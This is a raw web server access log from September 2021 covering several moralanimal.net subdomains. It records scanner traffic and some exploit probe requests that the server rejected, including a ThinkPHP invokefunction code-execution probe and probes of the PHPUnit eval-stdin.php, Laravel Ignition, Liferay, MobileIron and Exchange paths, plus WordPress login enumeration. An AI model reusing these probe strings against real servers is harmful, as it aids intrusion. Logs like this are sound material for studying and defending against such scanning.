[Client 144.86.173.94] [Length 0] [Gzip -] "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" "-" [09/Sep/2021:20:08:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 89.248.168.140] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "https://google.com" [09/Sep/2021:20:46:50 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [09/Sep/2021:20:46:50 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [09/Sep/2021:20:46:50 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [09/Sep/2021:20:46:50 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [09/Sep/2021:20:46:50 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [09/Sep/2021:20:46:50 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [09/Sep/2021:22:17:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 142.93.43.186] [Length 0] [Gzip -] "Mozilla/5.0 (iPad; CPU OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G36 Safari/601.1" "-" [09/Sep/2021:23:17:07 +0000] 400 - GET http localhost "/" [Client 47.99.130.186] [Length 154] [Gzip -] "-" "-" [09/Sep/2021:23:35:14 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.214.247] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Sep/2021:23:54:55 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Sep/2021:23:54:56 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [10/Sep/2021:00:01:52 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.213.58] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [10/Sep/2021:00:15:03 +0000] 400 - - https localhost "-" [Client 181.214.206.192] [Length 154] [Gzip -] "-" "-" [10/Sep/2021:01:07:11 +0000] 444 - GET https help.moralanimal.net "/" [Client 144.86.173.23] [Length 0] [Gzip -] "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" "-" [10/Sep/2021:02:42:00 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [10/Sep/2021:02:42:00 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [10/Sep/2021:03:16:26 +0000] 444 - GET https localhost "/t4" [Client 109.248.6.111] [Length 0] [Gzip -] "masscan-ng/1.3 (https://github.com/bi-zone/masscan-ng)" "-" [10/Sep/2021:04:19:17 +0000] 444 - GET https booksonic.moralanimal.net "/news/wp-login.php" [Client 37.187.150.87] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [10/Sep/2021:04:26:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.92] [Length 0] [Gzip -] "-" "-" [10/Sep/2021:05:34:34 +0000] 444 - GET https 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [10/Sep/2021:05:38:11 +0000] 400 - GET http localhost "/" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [10/Sep/2021:05:41:39 +0000] 444 - GET https booksonic.moralanimal.net "/home/wp-login.php" [Client 37.187.150.87] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [10/Sep/2021:05:55:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [10/Sep/2021:05:55:30 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [10/Sep/2021:05:55:30 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [10/Sep/2021:06:26:25 +0000] 444 - GET https booksonic.moralanimal.net "/blog/wp-login.php" [Client 37.187.150.87] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [10/Sep/2021:06:29:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.216.163] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [10/Sep/2021:06:58:05 +0000] 444 - GET https booksonic.moralanimal.net "/" [Client 61.135.15.178] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 9.0; MI 10 Build/123012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36" "-" [10/Sep/2021:07:04:56 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [10/Sep/2021:07:04:57 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [10/Sep/2021:07:08:22 +0000] 444 - GET https booksonic.moralanimal.net "/wp/wp-login.php" [Client 37.187.150.87] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [10/Sep/2021:07:49:32 +0000] 444 - GET https booksonic.moralanimal.net "/wp-login.php" [Client 37.187.150.87] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [10/Sep/2021:08:25:24 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 144.86.173.11] [Length 0] [Gzip -] "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" "-" [10/Sep/2021:09:43:22 +0000] 444 - GET https booksonic.moralanimal.net "/new/wp-login.php" [Client 37.187.150.87] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [10/Sep/2021:09:46:28 +0000] 444 - GET https booksonic.moralanimal.net "/wordpress/wp-login.php" [Client 37.187.150.87] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [10/Sep/2021:10:15:17 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Sep/2021:10:15:17 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Sep/2021:10:15:20 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Sep/2021:10:15:20 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [10/Sep/2021:10:15:22 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Sep/2021:10:15:22 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Sep/2021:10:15:22 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Sep/2021:10:15:24 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Sep/2021:10:15:25 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Sep/2021:10:15:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Sep/2021:10:15:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Sep/2021:10:15:30 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [10/Sep/2021:10:54:32 +0000] 444 - GET https booksonic.moralanimal.net "/web/wp-login.php" [Client 37.187.150.87] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [10/Sep/2021:11:21:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.116] [Length 0] [Gzip -] "-" "-" [10/Sep/2021:11:21:24 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.116] [Length 252] [Gzip -] "-" "-" [10/Sep/2021:11:21:24 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.116] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [10/Sep/2021:11:21:53 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [10/Sep/2021:11:21:54 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [10/Sep/2021:11:42:02 +0000] 444 - GET https booksonic.moralanimal.net "/test/wp-login.php" [Client 37.187.150.87] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [10/Sep/2021:11:55:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 104.140.188.6] [Length 0] [Gzip -] "https://gdnplus.com:Gather Analyze Provide." "-" [10/Sep/2021:12:01:29 +0000] 444 - GET https booksonic.moralanimal.net "/cms/wp-login.php" [Client 37.187.150.87] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [10/Sep/2021:12:14:24 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.221.242] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [10/Sep/2021:12:38:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [10/Sep/2021:13:28:38 +0000] 444 - GET https booksonic.moralanimal.net "/wp-login.php" [Client 37.187.150.87] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [10/Sep/2021:14:47:04 +0000] 444 - GET https booksonic.moralanimal.net "/en/wp-login.php" [Client 37.187.150.87] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [10/Sep/2021:14:47:29 +0000] 444 - GET https booksonic.moralanimal.net "/site/wp-login.php" [Client 37.187.150.87] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" "-" [10/Sep/2021:15:52:58 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [10/Sep/2021:15:52:59 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [10/Sep/2021:17:01:54 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [10/Sep/2021:17:01:54 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [10/Sep/2021:17:01:54 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [10/Sep/2021:17:01:54 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [10/Sep/2021:17:01:54 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [10/Sep/2021:17:01:54 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [10/Sep/2021:17:29:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [10/Sep/2021:18:28:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 143.110.243.117] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9" "-" [10/Sep/2021:20:19:42 +0000] 400 - - http localhost "-" [Client 94.232.42.169] [Length 154] [Gzip -] "-" "-" [10/Sep/2021:21:21:02 +0000] 444 - GET https whoami.moralanimal.net "/" [Client 144.86.173.11] [Length 0] [Gzip -] "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" "-" [10/Sep/2021:21:30:36 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/" [Client 61.135.15.165] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10.0; LG G2 Build/170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4472.114 Mobile Safari/537.36" "-" [10/Sep/2021:23:32:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 27.115.124.44] [Length 0] [Gzip -] "-" "-" [10/Sep/2021:23:32:46 +0000] 400 - - https localhost "-" [Client 27.115.124.106] [Length 154] [Gzip -] "-" "-" [10/Sep/2021:23:32:51 +0000] 400 - - http localhost "-" [Client 27.115.124.44] [Length 154] [Gzip -] "-" "-" [10/Sep/2021:23:32:57 +0000] 400 - - https localhost "-" [Client 27.115.124.108] [Length 0] [Gzip -] "-" "-" [10/Sep/2021:23:32:57 +0000] 444 - GET https 64.22.31.253 "/favicon.ico" [Client 27.115.124.75] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [10/Sep/2021:23:32:58 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 27.115.124.36] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [10/Sep/2021:23:32:59 +0000] 444 - GET https 64.22.31.253 "/sitemap.xml" [Client 27.115.124.43] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [10/Sep/2021:23:35:17 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.212.78] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [11/Sep/2021:00:01:48 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.213.50] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [11/Sep/2021:00:02:58 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.213.28] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [11/Sep/2021:00:03:10 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.207.42] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [11/Sep/2021:01:13:51 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [11/Sep/2021:01:13:51 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [11/Sep/2021:01:14:40 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.214.242] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [11/Sep/2021:01:32:25 +0000] 444 - GET https localhost "/" [Client 178.73.215.171] [Length 0] [Gzip -] "-" "-" [11/Sep/2021:01:39:20 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [11/Sep/2021:01:39:21 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [11/Sep/2021:01:40:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.2] [Length 0] [Gzip -] "-" "-" [11/Sep/2021:02:11:17 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [11/Sep/2021:02:11:17 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [11/Sep/2021:02:38:28 +0000] 400 - GET http 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [11/Sep/2021:02:57:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.57] [Length 0] [Gzip -] "-" "-" [11/Sep/2021:02:57:05 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.57] [Length 252] [Gzip -] "-" "-" [11/Sep/2021:02:57:05 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.57] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [11/Sep/2021:03:57:22 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Sep/2021:03:57:23 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Sep/2021:03:57:24 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Sep/2021:03:57:25 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Sep/2021:03:57:26 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Sep/2021:03:57:28 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Sep/2021:03:57:29 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [11/Sep/2021:03:57:30 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Sep/2021:03:57:31 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Sep/2021:03:57:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Sep/2021:03:57:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Sep/2021:03:57:34 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [11/Sep/2021:06:31:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.213.65] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [11/Sep/2021:07:23:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [11/Sep/2021:08:33:53 +0000] 444 - OPTIONS https 64.22.31.253 "/" [Client 195.78.54.162] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36" "-" [11/Sep/2021:10:13:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" 